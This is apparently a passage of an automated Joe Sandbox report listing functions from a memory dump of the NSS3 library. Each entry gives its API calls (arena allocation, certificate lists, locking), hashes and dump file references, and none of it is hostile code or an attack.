Opcode ID: bade7dce57563f624c831f0f6f8c1056328b3e337ac241c0adeffd40513f7ec8
Instruction ID: b3ecff167317ef8fe826a8d44b983bd2929dbd384f52feca923f7adc1a370914
Opcode Fuzzy Hash: bade7dce57563f624c831f0f6f8c1056328b3e337ac241c0adeffd40513f7ec8
Instruction Fuzzy Hash: 1A3128B4A0560ADFDB04EF69C88466ABBF4FF49304F108529E859D7700E730E994CBD5

Function 6C5D9F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C5DA71A,FFFFFFFF,?,?), ref: 6C5D9FAB

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C5DA71A,6C5DA71A,00000000), ref: 6C5D9FD9

Part of subcall function 6C5D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D136A
Part of subcall function 6C5D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D137E
Part of subcall function 6C5D1340: PL_ArenaGrow.NSS3(?,6C56F599,?,00000000,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?), ref: 6C5D13CF
Part of subcall function 6C5D1340: PR_Unlock.NSS3(?,?,6C57895A,00000000,?,00000000,?,00000000,?,00000000,?,6C56F599,?,00000000), ref: 6C5D145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C5DA71A,6C5DA71A,00000000), ref: 6C5DA009
PR_SetError.NSS3(FFFFE013,00000000,6C5DA71A,6C5DA71A,00000000), ref: 6C5DA045

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 88e98ea830592aa5632e9d92d9808ccfc0da535e53a655522795d7e6600ff52d
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 3F2180B5600306ABE7009F59DC50F67B7A9BB8536CF128128D82987B81FB75F814CB94

Function 6C5E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5E2E08

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C5E2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C5E2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5E2E95

Part of subcall function 6C5D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5788A4,00000000,00000000), ref: 6C5D1228
Part of subcall function 6C5D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C5D1238
Part of subcall function 6C5D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5788A4,00000000,00000000), ref: 6C5D124B
Part of subcall function 6C5D1200: PR_CallOnce.NSS3(6C6D2AA4,6C5D12D0,00000000,00000000,00000000,?,6C5788A4,00000000,00000000), ref: 6C5D125D
Part of subcall function 6C5D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C5D126F
Part of subcall function 6C5D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C5D1280
Part of subcall function 6C5D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C5D128E
Part of subcall function 6C5D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C5D129A
Part of subcall function 6C5D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5D12A1

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 49291992aaabb14b47e402140d4fe072291252f3717d63aef0fe0b5e1547f490
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: FE2126B1D003568BEB00CF549D44BBB3764AFD530CF160269DD089B746F7B1EA888392

Function 6C59ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C59ACC2

Part of subcall function 6C572F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C572F0A
Part of subcall function 6C572F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C572F1D

Part of subcall function 6C572AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C570A1B,00000000), ref: 6C572AF0
Part of subcall function 6C572AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C572B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C59AD5E

Part of subcall function 6C5B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C57B41E,00000000,00000000,?,00000000,?,6C57B41E,00000000,00000000,00000001,?), ref: 6C5B57E0
Part of subcall function 6C5B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5B5843

CERT_DestroyCertList.NSS3(?), ref: 6C59AD36

Part of subcall function 6C572F50: CERT_DestroyCertificate.NSS3(?), ref: 6C572F65
Part of subcall function 6C572F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C572F83

free.MOZGLUE(?), ref: 6C59AD4F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 7de6e05f99bbab724b32a3b60fa9d3a8a15d0c9c6288ff069f6c076e1021d92c
Instruction ID: cc2fb3807fac058d027b1d5ff452e53cd5d287fd8bd89a1deebecbf2527e513c
Opcode Fuzzy Hash: 7de6e05f99bbab724b32a3b60fa9d3a8a15d0c9c6288ff069f6c076e1021d92c
Instruction Fuzzy Hash: CE21CFB1D00254CBEB10DF65DC464EEB7B4EF45208F0540A8D8097B610FB31AE59CBB6

Function 6C5C3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C3C9E
EnterCriticalSection.KERNEL32(?), ref: 6C5C3CAE
PR_Unlock.NSS3(?), ref: 6C5C3CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C5C3D02

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: df505d671a6164d1200816953b7f0518ccf362444d1ee4fccd7c347856439a6a
Instruction ID: 4064fc31532d86efbaf5b7f5df9ce50961a0c9c9a8f8446a10f8815a4e629697
Opcode Fuzzy Hash: df505d671a6164d1200816953b7f0518ccf362444d1ee4fccd7c347856439a6a
Instruction Fuzzy Hash: 3811A279A00218AFD7009F65DC84ADA3778EF49368F554564EC0587712D730ED44C7E5

Function 6C5CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C5CF0AD,6C5CF150,?,6C5CF150,?,?,?), ref: 6C5CECBA

Part of subcall function 6C5D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5787ED,00000800,6C56EF74,00000000), ref: 6C5D1000
Part of subcall function 6C5D0FF0: PR_NewLock.NSS3(?,00000800,6C56EF74,00000000), ref: 6C5D1016
Part of subcall function 6C5D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5787ED,00000008,?,00000800,6C56EF74,00000000), ref: 6C5D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C5CECD1

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C5CED02

Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C5CED5A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 24d9a302ba1df6065da6039e462ef440468a5c3e6c5a79bd6d91ab9a6099828d
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 7821C2B1A017429BE700CF25DD45B52B7E4AFE5308F25C21DA81C87661E7B0E994C6D1

Function 6C5FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C5E7FFA,?,6C5E9767,?,8B7874C0,0000A48E), ref: 6C5FEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C5E7FFA,?,6C5E9767,?,8B7874C0,0000A48E), ref: 6C5FEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C5E7FFA,?,6C5E9767,?,8B7874C0,0000A48E), ref: 6C5FEE14

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

memcpy.VCRUNTIME140(?,?,6C5E9767,00000000,00000000,6C5E7FFA,?,6C5E9767,?,8B7874C0,0000A48E), ref: 6C5FEE33

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 9c2bf10a00a3f07536c9dd4a67fb8ce6a6b1f70d665fca9843bedb81e0f77a43
Instruction ID: 52b14777ee548abc1b3cac18c95c510ad91018f91d9bfe34707c0a32f18d2498
Opcode Fuzzy Hash: 9c2bf10a00a3f07536c9dd4a67fb8ce6a6b1f70d665fca9843bedb81e0f77a43
Instruction Fuzzy Hash: A411C6B1A04706ABEB109E65EC84B06B3A8EF0035DF204535EA29C7E00E371F465CFE5

Function 6C57DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C5906A0: TlsGetValue.KERNEL32 ref: 6C5906C2
Part of subcall function 6C5906A0: EnterCriticalSection.KERNEL32(?), ref: 6C5906D6
Part of subcall function 6C5906A0: PR_Unlock.NSS3 ref: 6C5906EB

CERT_NewCertList.NSS3 ref: 6C57DFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C57DFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C57DFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C57E029

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 4383d9b40a5e221845bb2836423511029ef356c356dadccfae531a4a88cccb53
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: 99110871A04306AFDB319EB95C48BEF76A8AB8135CF040938E91897B00E7B6DC5496F1

Function 6C598DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C598DE7
EnterCriticalSection.KERNEL32 ref: 6C598DFC
PR_Unlock.NSS3 ref: 6C598E2D
PR_SetError.NSS3 ref: 6C598E49

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 924bb77cdfea87eee95d3e68f7c58073cc7135e03240fe4de75f337d9d17c02c
Instruction ID: 85c1b512e08ffc5b8ce00cc97ab47214f891e8714e0ca8c5548fd67c53e05797
Opcode Fuzzy Hash: 924bb77cdfea87eee95d3e68f7c58073cc7135e03240fe4de75f337d9d17c02c
Instruction Fuzzy Hash: 50119171A096109FD700AF79C484169BBF4FF45314F014969DC89D7B00EB30E854CBD6

Function 6C61AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C605F17,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C61AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C605F17,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C61ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C61ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C60AAD4), ref: 6C61ACDB

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 1c5ae82f574ffb5e458c79588224719adf5571cee6404a76c3723ec3432e82c7
Instruction ID: ae2f1f54aae2fa9e160173f42471fc31609e6f15f2659e4e005c3ebff84c252b
Opcode Fuzzy Hash: 1c5ae82f574ffb5e458c79588224719adf5571cee6404a76c3723ec3432e82c7
Instruction Fuzzy Hash: 12019EB1601B019BEB10DF2AD908753B7E8BF0079AB004839D85AC3E11E732F519CB94

Function 6C581DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C581DFB

Part of subcall function 6C5795B0: TlsGetValue.KERNEL32(00000000,?,6C5900D2,00000000), ref: 6C5795D2
Part of subcall function 6C5795B0: EnterCriticalSection.KERNEL32(?,?,?,6C5900D2,00000000), ref: 6C5795E7
Part of subcall function 6C5795B0: PR_Unlock.NSS3(?,?,?,?,6C5900D2,00000000), ref: 6C579605

PR_EnterMonitor.NSS3 ref: 6C581E09

Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390AB
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C6390C9
Part of subcall function 6C639090: EnterCriticalSection.KERNEL32 ref: 6C6390E5
Part of subcall function 6C639090: TlsGetValue.KERNEL32 ref: 6C639116
Part of subcall function 6C639090: LeaveCriticalSection.KERNEL32 ref: 6C63913F

Part of subcall function 6C57E190: PR_EnterMonitor.NSS3(?,?,6C57E175), ref: 6C57E19C
Part of subcall function 6C57E190: PR_EnterMonitor.NSS3(6C57E175), ref: 6C57E1AA
Part of subcall function 6C57E190: PR_ExitMonitor.NSS3 ref: 6C57E208
Part of subcall function 6C57E190: PL_HashTableRemove.NSS3(?), ref: 6C57E219
Part of subcall function 6C57E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C57E231
Part of subcall function 6C57E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C57E249
Part of subcall function 6C57E190: PR_ExitMonitor.NSS3 ref: 6C57E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C581E37
PR_ExitMonitor.NSS3 ref: 6C581E4A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: acc1f139b618ece0bbb77a52639a174ca9adf0d7ed1812604cb3b469b3ae2d89
Instruction ID: 8478c541a9670ac68c18e1c06cfd64627e74676c7ade4482e916a50f4a77082e
Opcode Fuzzy Hash: acc1f139b618ece0bbb77a52639a174ca9adf0d7ed1812604cb3b469b3ae2d89
Instruction Fuzzy Hash: 1101A771B1117097EB109A6AEC44F477B64AB8274CF104135E9399BF51E731E814CBF9

Function 6C581D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C581D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C581D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C581D9C
free.MOZGLUE(00000000), ref: 6C581DB8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 760897770db9198525aad59201031e0c18393582808c231b2925bdcc855e6247
Instruction ID: b4c66147e55b69a426d9f35e0a9918b6b7a7448907a7db27c4e973b1225f1361
Opcode Fuzzy Hash: 760897770db9198525aad59201031e0c18393582808c231b2925bdcc855e6247
Instruction Fuzzy Hash: BDF0F9B260732057FF105F5A9C42B473658DBC1798F110A36DD299BF41DB71E80483E5

Function 6C5CFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C579003,?), ref: 6C5CFD91

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

PORT_Alloc_Util.NSS3(A4686C5D,?), ref: 6C5CFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5D,?,?), ref: 6C5CFDC4
free.MOZGLUE(00000000,?,?), ref: 6C5CFDD1

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: e44a4c9ed629bdbd8e68a54276ee3f9b0aea215fe85666964bfadadb0da06017
Instruction ID: 82106e0ec1b5e6c062ef73c489d2d7ecb76e19a193e205ca2a7cdf6d967a4ca6
Opcode Fuzzy Hash: e44a4c9ed629bdbd8e68a54276ee3f9b0aea215fe85666964bfadadb0da06017
Instruction Fuzzy Hash: 6AF0C8F5701202ABFB044B99DC8091B7758EF85799B148179ED098AB01E721E815C7F6

Function 6C68CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C68CC61
free.MOZGLUE ref: 6C68CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C68CC80
